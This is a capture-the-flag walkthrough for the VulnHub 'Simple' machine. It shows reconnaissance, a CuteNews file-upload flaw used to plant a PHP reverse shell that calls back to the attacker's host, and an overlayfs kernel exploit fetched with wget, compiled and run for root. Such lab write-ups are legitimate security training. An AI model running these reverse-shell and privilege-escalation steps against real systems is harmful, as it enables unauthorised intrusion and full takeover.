BNE0x03 – Simple

Compared to the last VulnHub box, this one is very simple and quick to root.

You can download the VM here

DESCRIPTION

Simple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal.

MAPPING THE TARGET

Firstly we need to find the IP of our target

1
2
3
4
5
6
7
8
[email protected]:~$ sudo netdiscover
Currently scanning: 192.168.10.0/16   |   Screen View: Unique Hosts

8 Captured ARP Req/Rep packets, from 8 hosts.   Total size: 480
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.1.27    00:0c:29:6d:14:f6      1      60  VMware, Inc.

Then we need to find what ports are open

1
2
3
4
5
6
7
8
9
10
[email protected]:~$ sudo nmap -A -T4 -p- 192.168.1.27

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-18 05:40 EST
Nmap scan report for 192.168.1.27
Host is up (0.00058s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Please Login / CuteNews

EXPLOITING

Okay, so all we have is Apache running a PHP application called CuteNews. If we visit the page we can see in the footer that the version it’s running is quite old

1
2
Powered by CuteNews 2.0.3 © 2002–2014 CutePHP.
(unregistered)

A search on exploit-db revealed an arbitrary file upload vulnerability we should be able to leverage. I created a new user called test, logged in and clicked on Personal Options. Using a copy of this reverse shell, I edited the required parts to point back to my kali VM and renamed the file extension to .jpg.

1
2
$ip = '192.168.0.21';  // CHANGE THIS
$port = 443;       // CHANGE THIS

I launched Burp Suite’s proxy interception tool and uploaded the reverse shell, replacing the extension with .php so it could be called later on.

burp

Step 6 in the exploit-db guide tells us that the shell will now be located in the /uploads/ directory so I fired up netcat and browsed to that location.

1
2
3
4
5
6
7
8
9
[email protected]:~$ sudo nc -lvp 443
listening on [any] 443 ...
192.168.1.27: inverse host lookup failed: Unknown host
connect to [192.168.1.21] from (UNKNOWN) [192.168.1.27] 57457
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 06:49:17 up  1:12,  0 users,  load average: 0.29, 0.14, 0.09
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Then I gained a bash shell with the following python snippet

python -c 'import pty;pty.spawn("/bin/bash")'

I spent a lot of time poking around and trying to find a hint of what needed to be done next. After an hour or two I noticed the kernel was fairly old and it was vulnerable to an overlayfs exploit

1
2
[email protected]:/$ uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linu

So I downloaded the exploit to the /tmp/ directory, compiled it, made it executable and ran it to gain a root shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
[email protected]:/tmp$ wget  https://exploit-db.com/download/37292

--2017-01-18 07:04:57--  https://exploit-db.com/download/37292
Resolving exploit-db.com (exploit-db.com)... 192.124.249.8
Connecting to exploit-db.com (exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: '37292'

100%[======================================>] 5,123       --.-K/s   in 0s      

2017-01-18 07:05:03 (336 MB/s) - '37292' saved [5123/5123]

[email protected]:/tmp$ mv 37292 37292.c

[email protected]:/tmp$ gcc 37292.c -o ofs

[email protected]:/tmp$ chmod +x ofs

[email protected]:/tmp$ ./ofs

spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library

# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# 

And from there was able to read the flag

1
2
3
4
# cd  /root
# cat  flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!